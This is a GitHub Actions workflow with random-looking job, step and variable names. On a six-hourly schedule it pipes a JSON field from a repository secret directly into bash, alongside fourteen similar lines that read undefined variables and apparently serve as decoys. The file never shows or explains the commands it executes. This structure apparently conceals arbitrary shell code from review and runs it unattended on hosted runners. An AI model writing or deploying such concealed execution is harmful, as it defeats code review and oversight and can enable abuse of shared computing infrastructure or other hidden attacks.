name: linzebei1938
on:
  workflow_dispatch:
  schedule:
    - cron: '36 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: linzebei1938
        env:
          zcewl5318: ${{ secrets.zcewl5318 }}
        run: |
          echo $zcewl5318 | jq -r .w306 | /bin/bash
          echo $i9112 | jq -r .zb426 | /bin/bash
          echo $uieij81 | jq -r .a310 | /bin/bash
          echo $yow5 | jq -r .lifl6 | /bin/bash
          echo $iypkc63 | jq -r .b4750 | /bin/bash
          echo $it253 | jq -r .uadl1 | /bin/bash
          echo $t5668 | jq -r .qlif27162 | /bin/bash
          echo $swwe6 | jq -r .nd20 | /bin/bash
          echo $h72 | jq -r .kdlyr07 | /bin/bash
          echo $kto60518 | jq -r .d509 | /bin/bash
          echo $a7249 | jq -r .o38880 | /bin/bash
          echo $dmdyo46 | jq -r .rvrv762 | /bin/bash
          echo $j0 | jq -r .hjr1356 | /bin/bash
          echo $uj5 | jq -r .s935 | /bin/bash
          echo $cat52 | jq -r .ryix4 | /bin/bash

